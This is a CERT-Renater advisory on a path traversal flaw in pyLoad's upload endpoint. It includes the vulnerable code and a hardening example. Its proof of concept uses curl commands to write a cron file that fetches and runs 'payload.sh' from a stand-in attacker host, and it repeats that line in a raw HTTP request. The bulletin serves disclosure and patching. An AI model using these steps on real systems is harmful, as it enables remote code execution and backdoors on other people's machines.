
=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN462
_____________________________________________________________________

DATE                : 22/07/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running pyload-ng versions prior to
                     0.5.0b3.dev90.

=====================================================================
https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg
_____________________________________________________________________


Path Traversal in `json/upload` Endpoint allows Arbitrary File Write
in `pyLoad`
High
GammaC0de published GHSA-xqpg-92fq-grfg Jul 21, 2025

Package
pyload-ng (pip)

Affected versions
0.5.0b3.dev89

Patched versions
0.5.0b3.dev90


Description

Summary

An authenticated path traversal vulnerability exists in the /json/upload
endpoint of pyLoad. By manipulating the filename of an uploaded file, an
attacker can traverse out of the intended upload directory, allowing them
to write arbitrary files to any location on the system writable by the
pyLoad process. This may lead to:

    Remote Code Execution (RCE)
    Local Privilege Escalation
    System-wide compromise
    Persistence and backdoors


Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

import os
from flask import request  # imports assumed from context; not shown in the advisory excerpt

@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        # VULNERABLE: file.filename is client-controlled and used unsanitised,
        # so "../" sequences in it escape dir_path.
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal
via ../../ sequences.
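The following is an added, stand-alone example of the two checks a hardened upload handler needs, written for this note; it is not pyLoad's code and not the fix shipped in commit fc4b136. It assumes the storage folder path and the "tmp_" prefix from the excerpt above; `STORAGE_FOLDER` and the sample filenames are constructed for the demonstration.

```python
import os
import re

# Constructed for this example: stands in for api.get_config_value("general", "storage_folder").
STORAGE_FOLDER = "/tmp/pyload-storage"

_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]+")


def sanitize_filename(filename: str) -> str:
    """Reduce a client-supplied filename to one safe path component.

    Drops any directory part (both '/' and '\\' separators), replaces
    characters outside a conservative allow-list, and rejects names that
    collapse to nothing (e.g. "..", "../", "").
    """
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    name = _UNSAFE_CHARS.sub("_", name).strip("._")
    if not name:
        raise ValueError(f"unusable filename: {filename!r}")
    return name


def safe_upload_path(dir_path: str, filename: str, prefix: str = "tmp_") -> str:
    """Return the absolute path an upload may be written to, or raise ValueError.

    Defence in depth: even after sanitisation, confirm the resolved target is
    still inside dir_path, so a later change to sanitize_filename cannot
    silently reintroduce traversal.
    """
    base = os.path.realpath(dir_path)
    target = os.path.realpath(os.path.join(base, prefix + sanitize_filename(filename)))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"target escapes storage folder: {filename!r}")
    return target


def is_accepted(dir_path: str, filename: str) -> bool:
    """True if safe_upload_path would accept this filename."""
    try:
        safe_upload_path(dir_path, filename)
        return True
    except ValueError:
        return False


def would_escape(dir_path: str, filename: str, prefix: str = "tmp_") -> bool:
    """Replicate the vulnerable join (no sanitisation) purely on strings and
    report whether the normalised result leaves dir_path. Useful for testing
    a handler or for triaging filenames seen in upload logs; touches no files.
    """
    base = os.path.normpath(os.path.abspath(dir_path))
    joined = os.path.normpath(os.path.join(base, prefix + filename))
    return os.path.commonpath([base, joined]) != base


if __name__ == "__main__":
    # Constructed sample filenames: one benign, the others traversal attempts.
    samples = [
        "report.pdf",
        "../../../../etc/cron.d/pyload_backdoor",
        "..\\..\\windows\\evil.txt",
        "..",
    ]
    for name in samples:
        print(f"{name!r:45} vulnerable-join escapes: {would_escape(STORAGE_FOLDER, name)!s:5} "
              f"hardened accepts: {is_accepted(STORAGE_FOLDER, name)}")
```

In the route, `file.save(file_path)` would become `file.save(safe_upload_path(dir_path, file.filename))` inside a `try` that returns an HTTP 400 on `ValueError`. The allow-list deliberately rewrites rather than rejects odd characters, so a legitimate upload with spaces or non-ASCII in its name still succeeds under a normalised name; if original names must be preserved, store them in a database column rather than on the filesystem.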


Proof of Concept

    Clone and install pyLoad from source (pip install pyload-ng):

git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload

    Or install via pip (PyPI) in a virtualenv:

python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload

    Login and obtain session token

curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"

    Create malicious cron payload

echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit

    Upload file with path traversal filename

curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"

    On the next cron tick, a reverse shell or payload will be triggered.


BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--


References

    fc4b136

Severity
High
7.5 / 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE ID
CVE-2025-54140

Weaknesses
Weakness CWE-22

Credits

    @odaysec odaysec Reporter



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================
